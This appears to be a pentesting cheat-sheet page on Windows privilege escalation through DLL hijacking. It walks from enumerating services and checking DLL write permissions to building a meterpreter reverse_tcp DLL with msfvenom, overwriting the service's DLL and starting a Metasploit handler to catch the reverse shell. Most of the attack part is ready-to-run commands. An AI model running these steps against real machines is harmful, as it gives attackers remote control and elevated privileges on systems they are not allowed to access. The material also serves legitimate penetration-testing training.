icon

Windows PrivEsc with DLL Hijacking

Last modified: 2024-04-01

If we found running services using netstat or Get-Process, identify the executable that service is running and reversing the file. If the executable loads some DLL, we can overwrite the DLL to execute arbitrary code.

Exploit

1. Enumerate Services (Processes)

At first, list running processes and find interesting ones.

tasklist
Get-Process
ps

2. Identify the Service

sc qc "example-service"

With the command above, we can see the path of the executable which runs the process.
To see what DLLs are loaded on the executable, disassemble/decompile it with strings command, WinDbg, x64dbg, or online tools such as Decompiler Explorer.

3. Check Write Permission of DLL

Find the DLL file on target machine, then check if we have write permission for the file.

icacls \path\to\example.dll

4. Create Malicious DLL

If we have write permission, we can override the .dll file.
So create a malicious DLL using msfvenom in local machine:

# Replace 10.0.0.1 with your local ip
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f dll -o evil.dll

After generating our evil.dll, replace the original DLL with this on target machine:

cp evil.dll \path\to\example.dll

Now start a TCP listener in local machine.

msfconsole
msf> use exploit/multi/handler
msf> set payload windows/x64/meterpreter/reverse_tcp
# Replace 10.0.0.1 with your ip
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run

When the service runs, our malicious DLL is loaded and the payload is executed.
We may get a shell.